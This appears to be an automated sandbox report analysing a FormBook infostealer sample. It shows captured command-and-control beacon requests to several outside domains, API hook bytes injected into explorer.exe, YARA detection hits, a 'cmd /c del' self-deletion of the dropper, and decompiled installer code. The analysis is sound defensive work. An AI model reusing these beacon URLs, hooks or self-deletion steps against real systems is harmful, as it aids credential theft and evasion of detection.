                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6e 74 65 63 6f 6c 69 76 69 6e 67 2e 63 6f 6d 2f 6b 6c 66 2f 3f 4b 58 36 78 4d 3d 30 72 6a 50 6f 66 71 68 53 5a 66 58 66 30 55 70 26 61 6d 70 3b 2d 5a 56 78 59 38 48 3d 75 5a 32 77 2b 5a 34 6a 49 70 5a 62 49 53 58 45 56 4f 30 6e 6e 6c 63 70 63 5a 71 4f 58 73 45 5a 35 65 7a 76 63 4f 51 46 58 75 31 4e 4f 4e 37 45 33 2f 44 58 67 71 68 33 47 44 76 6f 51 43 74 37 71 38 35 44 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&amp;-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D">here</a>.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.44976634.102.136.18080C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:28:02.183496952 CEST5879OUTGET /klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1
                                      Host: www.identityofplace.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:02.299362898 CEST5879INHTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:02 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "6063a886-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      2192.168.2.44976934.102.136.18080C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:28:24.908379078 CEST5899OUTGET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 HTTP/1.1
                                      Host: www.constipationhub.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:25.088542938 CEST5899INHTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:24 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "605db497-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      3192.168.2.44977034.102.136.18080C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:28:43.295202017 CEST5901OUTGET /klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1
                                      Host: www.tententacleshydro.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:43.409063101 CEST5902INHTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:43 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "605e0bc6-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      PeekMessageAINLINEexplorer.exe
                                      PeekMessageWINLINEexplorer.exe
                                      GetMessageWINLINEexplorer.exe
                                      GetMessageAINLINEexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function NameHook TypeNew Data
                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE1
                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE1
                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE1
                                      GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE1

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: Y4U48592345670954.exe PID: 7016 Parent PID: 6016

                                      General

                                      Start time:12:26:42
                                      Start date:08/04/2021
                                      Path:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase:0x400000
                                      File size:227550 bytes
                                      MD5 hash:E8E69391D3A931E6638ADAEBF6A339F6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: Y4U48592345670954.exe PID: 7080 Parent PID: 7016

                                      General

                                      Start time:12:26:43
                                      Start date:08/04/2021
                                      Path:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase:0x400000
                                      File size:227550 bytes
                                      MD5 hash:E8E69391D3A931E6638ADAEBF6A339F6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: explorer.exe PID: 3424 Parent PID: 7080

                                      General

                                      Start time:12:26:46
                                      Start date:08/04/2021
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:
                                      Imagebase:0x7ff6fee60000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: NETSTAT.EXE PID: 2628 Parent PID: 3424

                                      General

                                      Start time:12:26:57
                                      Start date:08/04/2021
                                      Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                      Imagebase:0xdd0000
                                      File size:32768 bytes
                                      MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      Chronological Activities

                                      Analysis Process: cmd.exe PID: 5052 Parent PID: 2628

                                      General

                                      Start time:12:27:02
                                      Start date:08/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: conhost.exe PID: 5692 Parent PID: 5052

                                      General

                                      Start time:12:27:02
                                      Start date:08/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Disassembly

                                      Code Analysis

                                      Reset < >

                                        Analysis Process: Y4U48592345670954.exe PID: 7016 Parent PID: 6016 Y4U48592345670954.exeCOMMON

                                        Executed Functions

                                        Function 0040314A, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282stringfilecomCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x7a3030 = _t31;
				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
				E004059BF(0x7a2780, "NSIS Error");
				_t89 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89);
				_t36 = E00403116(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "\"C:\\Users\\jones\\Desktop\\Y4U48592345670954.exe\" ";
					DeleteFileA(_t96); // executed
					E004059BF(_t96, GetCommandLineA());
					 *0x7a2f80 = GetModuleHandleA(0);
					_t41 = _t96;
					if("\"C:\\Users\\jones\\Desktop\\Y4U48592345670954.exe\" " == 0x22) {
						_v404 = 0x22;
						_t41 =  &M007A9001;
					}
					_t43 = CharNextA(E004054F7(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E004054F7(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E00403501();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x7a3014;
											if( *0x7a3014 != 0) {
												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x7a302c;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052BF(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x7a2f94 == _t46) {
										L31:
										 *0x7a302c =  *0x7a302c | 0xffffffff;
										_v396 = E00403526();
										goto L32;
									}
									_t103 = E004054F7(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x79d940 = 0x22;
											lstrcatA(0x79d940, _t89);
											lstrcatA(0x79d940, "Au_.exe");
											DeleteFileA(0x79d941);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
												E00405707(0x79d941, 0);
												if("C:\\Users\\jones\\AppData\\Local\\Temp" == 0) {
													E00405513(0x79e140);
												} else {
													E004059BF(0x79e140, "C:\\Users\\jones\\AppData\\Local\\Temp");
												}
												lstrcatA(0x79d940, "\" ");
												lstrcatA(0x79d940, _v400);
												lstrcatA(0x79d940, " _?=");
												lstrcatA(0x79d940, 0x79e140);
												E004054CC(0x79d940);
												_t78 = E00405247(0x79d940, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055AC(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403116(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}































                                        0x00403153
                                        0x00403156
                                        0x0040315a
                                        0x0040315f
                                        0x00403164
                                        0x0040316b
                                        0x00403171
                                        0x00403187
                                        0x00403197
                                        0x0040319c
                                        0x004031a7
                                        0x004031ad
                                        0x004031b2
                                        0x004031b4
                                        0x004031da
                                        0x004031da
                                        0x004031e0
                                        0x004031ee
                                        0x00403202
                                        0x00403207
                                        0x00403209
                                        0x0040320b
                                        0x00403210
                                        0x00403210
                                        0x00403220
                                        0x00403226
                                        0x0040328f
                                        0x0040328f
                                        0x00403291
                                        0x00403293
                                        0x00000000
                                        0x00000000
                                        0x0040322c
                                        0x0040322f
                                        0x00403237
                                        0x00403237
                                        0x0040323a
                                        0x0040323f
                                        0x00403241
                                        0x00403241
                                        0x00403242
                                        0x00403242
                                        0x00403247
                                        0x0040324a
                                        0x0040327f
                                        0x00403284
                                        0x00403289
                                        0x0040328c
                                        0x0040328e
                                        0x0040328e
                                        0x0040328e
                                        0x00000000
                                        0x0040324c
                                        0x0040324c
                                        0x0040324d
                                        0x00403250
                                        0x00403258
                                        0x0040325b
                                        0x0040325d
                                        0x0040325d
                                        0x0040325d
                                        0x0040325b
                                        0x00403260
                                        0x00403266
                                        0x0040326e
                                        0x00403271
                                        0x00403273
                                        0x00403273
                                        0x00403273
                                        0x00403271
                                        0x00403276
                                        0x0040327d
                                        0x00403297
                                        0x0040329b
                                        0x004032a4
                                        0x004032a9
                                        0x004032aa
                                        0x004032af
                                        0x004032b3
                                        0x00403316
                                        0x00403316
                                        0x0040331b
                                        0x00403323
                                        0x0040344e
                                        0x00403455
                                        0x00403471
                                        0x0040347e
                                        0x00403487
                                        0x00403489
                                        0x0040348b
                                        0x0040348d
                                        0x0040348f
                                        0x00403491
                                        0x00403493
                                        0x004034a3
                                        0x004034a5
                                        0x004034a7
                                        0x004034b4
                                        0x004034c3
                                        0x004034cb
                                        0x004034d3
                                        0x004034d3
                                        0x004034a7
                                        0x00403493
                                        0x0040348f
                                        0x004034d8
                                        0x004034de
                                        0x004034e0
                                        0x004034e4
                                        0x004034e4
                                        0x004034e0
                                        0x004034e9
                                        0x004034ee
                                        0x004034f1
                                        0x004034f3
                                        0x004034f3
                                        0x004034fb
                                        0x004034fb
                                        0x0040332f
                                        0x00403336
                                        0x00403336
                                        0x004032bb
                                        0x00403306
                                        0x00403306
                                        0x00403312
                                        0x00000000
                                        0x00403312
                                        0x004032c4
                                        0x004032d1
                                        0x004032c8
                                        0x004032ce
                                        0x00000000
                                        0x00000000
                                        0x004032d0
                                        0x004032d0
                                        0x004032d0
                                        0x004032d5
                                        0x004032d7
                                        0x004032dc
                                        0x00403342
                                        0x0040334a
                                        0x00403350
                                        0x0040335f
                                        0x00403361
                                        0x0040336a
                                        0x00403375
                                        0x0040337f
                                        0x00403387
                                        0x00000000
                                        0x00000000
                                        0x004033b3
                                        0x00000000
                                        0x00000000
                                        0x004033c9
                                        0x004033d2
                                        0x004033de
                                        0x004033ee
                                        0x004033e0
                                        0x004033e6
                                        0x004033e6
                                        0x004033f9
                                        0x00403403
                                        0x0040340e
                                        0x00403415
                                        0x0040341b
                                        0x00403422
                                        0x00403429
                                        0x0040342c
                                        0x00403432
                                        0x00403432
                                        0x00403429
                                        0x00403434
                                        0x00403434
                                        0x0040343a
                                        0x0040343e
                                        0x00000000
                                        0x00403449
                                        0x004032de
                                        0x004032e1
                                        0x004032ec
                                        0x00000000
                                        0x00000000
                                        0x004032f4
                                        0x004032ff
                                        0x00403304
                                        0x00000000
                                        0x00403304
                                        0x00000000
                                        0x0040327d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403231
                                        0x00403231
                                        0x00403231
                                        0x00403232
                                        0x00403232
                                        0x00000000
                                        0x00403231
                                        0x00000000
                                        0x00403295
                                        0x004031bc
                                        0x004031c8
                                        0x004031d4
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                        • #17.COMCTL32 ref: 00403164
                                        • OleInitialize.OLE32(00000000), ref: 0040316B
                                        • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                          • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                        • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\Y4U48592345670954.exe" ), ref: 004031E0
